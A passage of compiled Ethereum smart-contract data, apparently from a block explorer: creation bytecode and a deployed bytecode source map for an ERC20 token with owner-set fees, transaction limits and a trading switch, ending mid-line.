0008135905061400381613fdd565b92915050565b600080604083850312156140205761401f613d1c565b5b600061402e85828601613d6a565b925050602061403f85828601613ff4565b9150509250929050565b60008060006060848603121561406257614061613d1c565b5b600061407086828701613da0565b935050602061408186828701613da0565b925050604061409286828701613da0565b9150509250925092565b600080604083850312156140b3576140b2613d1c565b5b60006140c185828601613da0565b92505060206140d285828601613da0565b9150509250929050565b600080604083850312156140f3576140f2613d1c565b5b600061410185828601613d6a565b925050602061411285828601613d6a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061416357607f821691505b6020821081036141765761417561411c565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141b2602083613c6c565b91506141bd8261417c565b602082019050919050565b600060208201905081810360008301526141e1816141a5565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061425182613d7f565b915061425c83613d7f565b92508261426c5761426b6141e8565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142d3602f83613c6c565b91506142de82614277565b604082019050919050565b60006020820190508181036000830152614302816142c6565b9050919050565b600061431482613d7f565b915061431f83613d7f565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561435457614353614217565b5b828201905092915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b6000614395601d83613c6c565b91506143a08261435f565b602082019050919050565b600060208201905081810360008301526143c481614388565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b6000614401600483613c6c565b915061440c826143cb565b602082019050919050565b60006020820190508181036000830152614430816143f4565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614493603983613c6c565b915061449e82614437565b604082019050919050565b600060208201905081810360008301526144c281614486565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144ff600f83613c6c565b915061450a826144c9565b602082019050919050565b6000602082019050818103600083015261452e816144f2565b9050919050565b600081905092915050565b50565b6000614550600083614535565b915061455b82614540565b600082019050919050565b600061457182614543565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b60006145b1601d83613c6c565b91506145bc8261457b565b602082019050919050565b600060208201905081810360008301526145e0816145a4565b9050919050565b60006145f282613d7f565b91506145fd83613d7f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561463657614635614217565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b600061469d602483613c6c565b91506146a882614641565b604082019050919050565b600060208201905081810360008301526146cc81614690565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b600061472f603583613c6c565b915061473a826146d3565b604082019050919050565b6000602082019050818103600083015261475e81614722565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b60006147c1603483613c6c565b91506147cc82614765565b604082019050919050565b600060208201905081810360008301526147f0816147b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614853602683613c6c565b915061485e826147f7565b604082019050919050565b6000602082019050818103600083015261488281614846565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b60006148bf601b83613c6c565b91506148ca82614889565b602082019050919050565b600060208201905081810360008301526148ee816148b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614951602483613c6c565b915061495c826148f5565b604082019050919050565b6000602082019050818103600083015261498081614944565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149e3602283613c6c565b91506149ee82614987565b604082019050919050565b60006020820190508181036000830152614a12816149d6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a75602583613c6c565b9150614a8082614a19565b604082019050919050565b60006020820190508181036000830152614aa481614a68565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614b07602383613c6c565b9150614b1282614aab565b604082019050919050565b60006020820190508181036000830152614b3681614afa565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b73601683613c6c565b9150614b7e82614b3d565b602082019050919050565b60006020820190508181036000830152614ba281614b66565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614c05603583613c6c565b9150614c1082614ba9565b604082019050919050565b60006020820190508181036000830152614c3481614bf8565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c97603683613c6c565b9150614ca282614c3b565b604082019050919050565b60006020820190508181036000830152614cc681614c8a565b9050919050565b6000614cd882613d7f565b9150614ce383613d7f565b925082614cf357614cf26141e8565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d5a602483613c6c565b9150614d6582614cfe565b604082019050919050565b60006020820190508181036000830152614d8981614d4d565b9050919050565b6000614d9b82613d7f565b9150614da683613d7f565b925082821015614db957614db8614217565b5b828203905092915050565b60008160011c9050919050565b6000808291508390505b6001851115614e1b57808604811115614df757614df6614217565b5b6001851615614e065780820291505b8081029050614e1485614dc4565b9450614ddb565b94509492505050565b600082614e345760019050614ef0565b81614e425760009050614ef0565b8160018114614e585760028114614e6257614e91565b6001915050614ef0565b60ff841115614e7457614e73614217565b5b8360020a915084821115614e8b57614e8a614217565b5b50614ef0565b5060208310610133831016604e8410600b8410161715614ec65782820a905083811115614ec157614ec0614217565b5b614ef0565b614ed38484846001614dd1565b92509050818404811115614eea57614ee9614217565b5b81810290505b9392505050565b6000614f0282613d7f565b9150614f0d83613f7c565b9250614f3a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614e24565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614faf81613d53565b92915050565b600060208284031215614fcb57614fca613d1c565b5b6000614fd984828501614fa0565b91505092915050565b6000819050919050565b6000615007615002614ffd84614fe2565b613e58565b613d7f565b9050919050565b61501781614fec565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61505281613d41565b82525050565b60006150648383615049565b60208301905092915050565b6000602082019050919050565b60006150888261501d565b6150928185615028565b935061509d83615039565b8060005b838110156150ce5781516150b58882615058565b97506150c083615070565b9250506001810190506150a1565b5085935050505092915050565b600060a0820190506150f06000830188613ed2565b6150fd602083018761500e565b818103604083015261510f818661507d565b905061511e6060830185613fb3565b61512b6080830184613ed2565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615191602183613c6c565b915061519c82615135565b604082019050919050565b600060208201905081810360008301526151c081615184565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e6a9260ef246c4bbcd6b7745bdac37e083a6e110e560aa9c911db951de063bb864736f6c634300080e0033

Deployed Bytecode Sourcemap

29573:13920:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7735:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9902:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30933:64;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29652:41;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8855:108;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37732:157;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30712:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30672;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35032:255;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10553:355;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8697:93;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11317:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29700:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29989:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37903:125;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30523:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30069:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9026:127;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22200:148;;;;;;;;;;;;;:::i;:::-;;34243:121;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35522:144;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29796:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30412;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35678:369;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;43259:229;;;;;;;;;;;;;:::i;:::-;;21558:79;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29833:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30558:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7954:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37064:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30486:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30752:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36635:421;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30634:25;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12038:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9366:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37512:208;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31155:58;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30029:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36445:182;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;36059:378;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;35295:215;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30291:40;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29870:35;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34639:381;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30378:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9604:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29912:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34429:135;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30449:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22503:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30596:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29952:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7735:100;7789:13;7822:5;7815:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7735:100;:::o;9902:169::-;9985:4;10002:39;10011:12;:10;:12::i;:::-;10025:7;10034:6;10002:8;:39::i;:::-;10059:4;10052:11;;9902:169;;;;:::o;30933:64::-;;;;;;;;;;;;;;;;;;;;;;:::o;29652:41::-;;;;;;;;;;;;;:::o;8855:108::-;8916:7;8943:12;;8936:19;;8855:108;:::o;37732:157::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37839:9:::1;;;;;;;;;;;37811:38;;37828:9;37811:38;;;;;;;;;;;;37872:9;37860;;:21;;;;;;;;;;;;;;;;;;37732:157:::0;:::o;30712:33::-;;;;:::o;30672:::-;;;;:::o;35032:255::-;35118:15;;;;;;;;;;;35104:29;;:10;:29;;;35096:38;;;;;;35183:4;35167:13;:11;:13::i;:::-;:20;;;;:::i;:::-;35157:6;:30;;35149:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;35273:6;35250:20;:29;;;;35032:255;:::o;10553:355::-;10693:4;10710:36;10720:6;10728:9;10739:6;10710:9;:36::i;:::-;10757:121;10766:6;10774:12;:10;:12::i;:::-;10788:89;10826:6;10788:89;;;;;;;;;;;;;;;;;:11;:19;10800:6;10788:19;;;;;;;;;;;;;;;:33;10808:12;:10;:12::i;:::-;10788:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;10757:8;:121::i;:::-;10896:4;10889:11;;10553:355;;;;;:::o;8697:93::-;8755:5;8780:2;8773:9;;8697:93;:::o;11317:218::-;11405:4;11422:83;11431:12;:10;:12::i;:::-;11445:7;11454:50;11493:10;11454:11;:25;11466:12;:10;:12::i;:::-;11454:25;;;;;;;;;;;;;;;:34;11480:7;11454:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;11422:8;:83::i;:::-;11523:4;11516:11;;11317:218;;;;:::o;29700:28::-;;;;;;;;;;;;;:::o;29989:33::-;;;;;;;;;;;;;:::o;37903:125::-;37968:4;37992:19;:28;38012:7;37992:28;;;;;;;;;;;;;;;;;;;;;;;;;37985:35;;37903:125;;;:::o;30523:28::-;;;;:::o;30069:31::-;;;;;;;;;;;;;:::o;9026:127::-;9100:7;9127:9;:18;9137:7;9127:18;;;;;;;;;;;;;;;;9120:25;;9026:127;;;:::o;22200:148::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;22307:1:::1;22270:40;;22291:6;;;;;;;;;;;22270:40;;;;;;;;;;;;22338:1;22321:6;;:19;;;;;;;;;;;;;;;;;;22200:148::o:0;34243:121::-;34295:4;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34329:5:::1;34312:14;;:22;;;;;;;;;;;;;;;;;;34352:4;34345:11;;34243:121:::0;:::o;35522:144::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35654:4:::1;35612:31;:39;35644:6;35612:39;;;;;;;;;;;;;;;;:46;;;;;;;;;;;;;;;;;;35522:144:::0;;:::o;29796:30::-;;;;;;;;;;;;;:::o;30412:::-;;;;:::o;35678:369::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35812:13:::1;35794:15;:31;;;;35854:13;35836:15;:31;;;;35890:7;35878:9;:19;;;;35959:9;;35941:15;;35923;;:33;;;;:::i;:::-;:45;;;;:::i;:::-;35908:12;:60;;;;36003:2;35987:12;;:18;;35979:60;;;;;;;;;;;;:::i;:::-;;;;;;;;;35678:369:::0;;;:::o;43259:229::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;43330:4:::1;43316:11;;:18;;;;;;;;;;;;;;;;;;43368:4;43353:19;;:11;;;;;;;;;;;:19;;;43345:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;43406:5;43392:11;;:19;;;;;;;;;;;;;;;;;;43422:13;:11;:13::i;:::-;43451:29;43468:11;;;;;;;;;;;43451:29;;;;;;:::i;:::-;;;;;;;;43259:229::o:0;21558:79::-;21596:7;21623:6;;;;;;;;;;;21616:13;;21558:79;:::o;29833:24::-;;;;;;;;;;;;;:::o;30558:31::-;;;;:::o;7954:104::-;8010:13;8043:7;8036:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7954:104;:::o;37064:244::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37171:13:::1;;;;;;;;;;;37163:21;;:4;:21;;::::0;37155:91:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;37259:41;37288:4;37294:5;37259:28;:41::i;:::-;37064:244:::0;;:::o;30486:24::-;;;;:::o;30752:27::-;;;;:::o;36635:421::-;36695:4;36720:19;:31;36740:10;36720:31;;;;;;;;;;;;;;;;;;;;;;;;;36712:40;;;;;;36765:7;36775:24;36785:13;;;;;;;;;;;36775:9;:24::i;:::-;36765:34;;36825:1;36820:2;:6;:23;;;;;36840:3;36835:2;:8;;;;:::i;:::-;36830:2;:13;36820:23;36812:51;;;;;;;;;;;;:::i;:::-;;;;;;;;;36876:22;36895:2;36876:18;:22::i;:::-;36909:20;36926:2;36909:16;:20::i;:::-;36943:12;36968:15;;;;;;;;;;;36960:29;;36997:21;36960:63;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;36942:81;;;37041:7;37034:14;;;;36635:421;;;;:::o;30634:25::-;;;;:::o;12038:269::-;12131:4;12148:129;12157:12;:10;:12::i;:::-;12171:7;12180:96;12219:15;12180:96;;;;;;;;;;;;;;;;;:11;:25;12192:12;:10;:12::i;:::-;12180:25;;;;;;;;;;;;;;;:34;12206:7;12180:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;12148:8;:129::i;:::-;12295:4;12288:11;;12038:269;;;;:::o;9366:175::-;9452:4;9469:42;9479:12;:10;:12::i;:::-;9493:9;9504:6;9469:9;:42::i;:::-;9529:4;9522:11;;9366:175;;;;:::o;37512:208::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37649:15:::1;;;;;;;;;;;37606:59;;37629:18;37606:59;;;;;;;;;;;;37694:18;37676:15;;:36;;;;;;;;;;;;;;;;;;37512:208:::0;:::o;31155:58::-;;;;;;;;;;;;;;;;;;;;;;:::o;30029:33::-;;;;;;;;;;;;;:::o;36445:182::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36561:8:::1;36530:19;:28;36550:7;36530:28;;;;;;;;;;;;;;;;:39;;;;;;;;;;;;;;;;;;36601:7;36585:34;;;36610:8;36585:34;;;;;;:::i;:::-;;;;;;;;36445:182:::0;;:::o;36059:378::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36195:13:::1;36176:16;:32;;;;36238:13;36219:16;:32;;;;36275:7;36262:10;:20;;;;36347:10;;36328:16;;36309;;:35;;;;:::i;:::-;:48;;;;:::i;:::-;36293:13;:64;;;;36393:2;36376:13;;:19;;36368:61;;;;;;;;;;;;:::i;:::-;;;;;;;;;36059:378:::0;;;:::o;35295:215::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35417:4:::1;35411;35407:1;35391:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;35390:31;;;;:::i;:::-;35380:6;:41;;35372:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;35495:6;35485;:17;;;;:::i;:::-;35473:9;:29;;;;35295:215:::0;:::o;30291:40::-;;;;;;;;;;;;;:::o;29870:35::-;;;;:::o;34639:381::-;34720:4;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34776:6:::1;34772:1;34756:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:26;;;;:::i;:::-;34743:9;:39;;34735:105;;;;;;;;;;;;:::i;:::-;;;;;;;;;34891:4;34887:1;34871:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;34858:9;:37;;34850:102;;;;;;;;;;;;:::i;:::-;;;;;;;;;34983:9;34962:18;:30;;;;35009:4;35002:11;;34639:381:::0;;;:::o;30378:27::-;;;;:::o;9604:151::-;9693:7;9720:11;:18;9732:5;9720:18;;;;;;;;;;;;;;;:27;9739:7;9720:27;;;;;;;;;;;;;;;;9713:34;;9604:151;;;;:::o;29912:33::-;;;;:::o;34429:135::-;34489:4;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34529:5:::1;34506:20;;:28;;;;;;;;;;;;;;;;;;34552:4;34545:11;;34429:135:::0;:::o;30449:30::-;;;;:::o;22503:244::-;21780:12;:10;:12::i;:::-;21770:22;;:6;;;;;;;;;;;:22;;;21762:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;22612:1:::1;22592:22;;:8;:22;;::::0;22584:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;22702:8;22673:38;;22694:6;;;;;;;;;;;22673:38;;;;;;;;;;;;22731:8;22722:6;;:17;;;;;;;;;;;;;;;;;;22503:244:::0;:::o;30596:31::-;;;;:::o;29952:24::-;;;;:::o;16602:181::-;16660:7;16680:9;16696:1;16692;:5;;;;:::i;:::-;16680:17;;16721:1;16716;:6;;16708:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;16774:1;16767:8;;;16602:181;;;;:::o;373:98::-;426:7;453:10;446:17;;373:98;:::o;15224:380::-;15377:1;15360:19;;:5;:19;;;15352:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15458:1;15439:21;;:7;:21;;;15431:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15542:6;15512:11;:18;15524:5;15512:18;;;;;;;;;;;;;;;:27;15531:7;15512:27;;;;;;;;;;;;;;;:36;;;;15580:7;15564:32;;15573:5;15564:32;;;15589:6;15564:32;;;;;;:::i;:::-;;;;;;;;15224:380;;;:::o;38234:3362::-;38382:1;38366:18;;:4;:18;;;38358:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;38459:1;38445:16;;:2;:16;;;38437:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;38528:1;38518:6;:11;38515:92;;38546:28;38562:4;38568:2;38572:1;38546:15;:28::i;:::-;38589:7;;38515:92;38630:14;;;;;;;;;;;38627:997;;;38690:7;:5;:7::i;:::-;38682:15;;:4;:15;;;;:49;;;;;38724:7;:5;:7::i;:::-;38718:13;;:2;:13;;;;38682:49;:86;;;;;38766:1;38752:16;;:2;:16;;;;38682:86;:128;;;;;38803:6;38789:21;;:2;:21;;;;38682:128;:158;;;;;38832:8;;;;;;;;;;;38831:9;38682:158;38660:953;;;38878:13;;;;;;;;;;;38874:148;;38923:19;:25;38943:4;38923:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;38952:19;:23;38972:2;38952:23;;;;;;;;;;;;;;;;;;;;;;;;;38923:52;38915:87;;;;;;;;;;;;:::i;:::-;;;;;;;;;38874:148;39091:25;:31;39117:4;39091:31;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;39127:31;:35;39159:2;39127:35;;;;;;;;;;;;;;;;;;;;;;;;;39126:36;39091:71;39087:511;;;39209:20;;39199:6;:30;;39191:96;;;;;;;;;;;;:::i;:::-;;;;;;;;;39087:511;;;39381:25;:29;39407:2;39381:29;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;39415:31;:37;39447:4;39415:37;;;;;;;;;;;;;;;;;;;;;;;;;39414:38;39381:71;39377:221;;;39499:20;;39489:6;:30;;39481:97;;;;;;;;;;;;:::i;:::-;;;;;;;;;39377:221;39087:511;38660:953;38627:997;39638:28;39669:24;39687:4;39669:9;:24::i;:::-;39638:55;;39714:12;39753:18;;39729:20;:42;;39714:57;;39802:7;:35;;;;;39826:11;;;;;;;;;;;39802:35;:61;;;;;39855:8;;;;;;;;;;;39854:9;39802:61;:110;;;;;39881:25;:31;39907:4;39881:31;;;;;;;;;;;;;;;;;;;;;;;;;39880:32;39802:110;:153;;;;;39930:19;:25;39950:4;39930:25;;;;;;;;;;;;;;;;;;;;;;;;;39929:26;39802:153;:194;;;;;39973:19;:23;39993:2;39973:23;;;;;;;;;;;;;;;;;;;;;;;;;39972:24;39802:194;39784:338;;;40034:4;40023:8;;:15;;;;;;;;;;;;;;;;;;40067:10;:8;:10::i;:::-;40105:5;40094:8;;:16;;;;;;;;;;;;;;;;;;39784:338;40134:12;40150:8;;;;;;;;;;;40149:9;40134:24;;40259:19;:25;40279:4;40259:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;40288:19;:23;40308:2;40288:23;;;;;;;;;;;;;;;;;;;;;;;;;40259:52;40256:99;;;40338:5;40328:15;;40256:99;40375:12;40479:7;40476:1067;;;40530:25;:29;40556:2;40530:29;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;;40579:1;40563:13;;:17;40530:50;40526:848;;;40607:34;40637:3;40607:25;40618:13;;40607:6;:10;;:25;;;;:::i;:::-;:29;;:34;;;;:::i;:::-;40600:41;;40708:13;;40689:16;;40682:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;40660:18;;:61;;;;;;;:::i;:::-;;;;;;;;40776:13;;40763:10;;40756:4;:17;;;;:::i;:::-;:33;;;;:::i;:::-;40740:12;;:49;;;;;;;:::i;:::-;;;;;;;;40856:13;;40837:16;;40830:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;40808:18;;:61;;;;;;;:::i;:::-;;;;;;;;40920:1;40915;40892:20;;:24;;;;:::i;:::-;:29;40888:81;;40923:46;;;;;;;;;;:::i;:::-;;;;;;;;40888:81;40526:848;;;41030:25;:31;41056:4;41030:31;;;;;;;;;;;;;;;;;;;;;;;;;:51;;;;;41080:1;41065:12;;:16;41030:51;41027:347;;;41106:33;41135:3;41106:24;41117:12;;41106:6;:10;;:24;;;;:::i;:::-;:28;;:33;;;;:::i;:::-;41099:40;;41202:12;;41184:15;;41177:4;:22;;;;:::i;:::-;:37;;;;:::i;:::-;41155:18;;:59;;;;;;;:::i;:::-;;;;;;;;41268:12;;41256:9;;41249:4;:16;;;;:::i;:::-;:31;;;;:::i;:::-;41233:12;;:47;;;;;;;:::i;:::-;;;;;;;;41346:12;;41328:15;;41321:4;:22;;;;:::i;:::-;:37;;;;:::i;:::-;41299:18;;:59;;;;;;;:::i;:::-;;;;;;;;41027:347;40526:848;41412:1;41405:4;:8;41402:93;;;41437:42;4145